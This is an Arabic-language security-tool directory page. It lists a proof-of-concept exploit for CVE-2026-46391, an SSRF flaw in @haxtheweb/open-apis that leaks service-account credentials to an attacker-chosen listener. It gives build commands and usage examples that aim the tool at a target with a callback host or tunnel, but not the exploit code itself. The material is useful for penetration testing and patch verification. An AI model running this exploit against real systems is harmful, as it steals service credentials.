Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-46391 — استغلال إثبات المفهوم لـ CVE-2026-46391 | Kitploit
أدوات/GitHubGitHub/bradyjmcl/cve-2026-46391
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

استغلال إثبات المفهوم لـ CVE-2026-46391

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-46391 - كشف بيانات الاعتماد عبر SSRF في @haxtheweb/open-apis

test

إثبات مفهوم لـ CVE-2026-46391. يُطلق ثغرة SSRF في نقطة النهاية cacheAddress الخاصة بـ @haxtheweb/open-apis ويلتقط بيانات اعتماد حساب الخدمة المرسلة في رد الاتصال.

البناء

root@kitploit:~
go build -o cve-2026-46391 .

الاختبار

root@kitploit:~
go test ./...

الاستخدام

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]

الخيارات

أمثلة

مباشر (على نفس شبكة الهدف):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

عبر VPS/نفق Cloudflare/إلخ:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

منفذ ومهلة مخصصان:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
تنزيل الأداة
الخيارالوصفالافتراضي
-u, --urlجذر الويب المستهدف (مثل http://10.10.0.80:3000)مطلوب
-l, --listenerعنوان IP/اسم المضيف الخاص بك أو عنوان النفق (مثل 192.168.1.10، https://uuid.trycloudflare.com)مطلوب
-p, --portالمنفذ المحلي الذي سيتم الاستماع عليه8080
-t, --timeoutالثواني التي يتم انتظار رد الاتصال خلالها30
-v, --verboseطباعة الترويسات ومحتوى كل طلب واردمعطّل